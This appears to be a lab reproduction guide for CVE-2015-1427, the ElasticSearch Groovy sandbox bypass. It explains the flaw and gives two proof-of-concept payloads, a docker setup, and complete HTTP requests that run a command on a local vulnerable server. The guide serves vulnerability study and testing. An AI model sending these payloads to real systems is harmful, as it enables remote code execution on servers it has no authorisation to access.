ElasticSearch Groovy Sandbox Bypass and Remote Code Execution (CVE-2015-1427)¶

中文版本(Chinese version)

ElasticSearch is a distributed, RESTful search and analytics engine.

ElasticSearch versions prior to 1.3.8 and 1.4.3 contain a vulnerability in the Groovy scripting engine that allows attackers to bypass the sandbox protection and execute arbitrary code on the server.

After CVE-2014-3120, ElasticSearch changed its default dynamic scripting language to Groovy and added a sandbox. However, dynamic language execution remained enabled by default. This vulnerability involves:

1. A sandbox bypass
2. A Groovy code execution vulnerability

ElasticSearch supports using "sandboxed" Groovy language as a dynamic scripting engine. However, the sandbox implementation was insufficient. Two methods for command execution were discovered:

1. Lupin's method: Bypass the Java sandbox using reflection
2. Tang3's method: Use Groovy language features to execute commands directly, without using Java

Based on these approaches, we have two different POCs.

Java sandbox bypass method:

java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()

Groovy direct command execution method:

def command='id';def res=command.execute().text;res

References:

• http://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
• https://github.com/XiphosResearch/exploits
• http://cb.drops.wiki/drops/papers-5107.html
• http://cb.drops.wiki/drops/papers-5142.html

Environment Setup¶

Execute the following commands to start a 1.4.2 version ElasticSearch server:

docker compose up -d

After the server starts, you can access the ElasticSearch server at http://your-ip:9200.

Vulnerability Reproduction¶

Since querying requires at least one document in the index, first send the following request to add data:

POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "test"
}

Then send a request containing the payload to execute arbitrary commands:

POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

The command execution result will be returned in the response: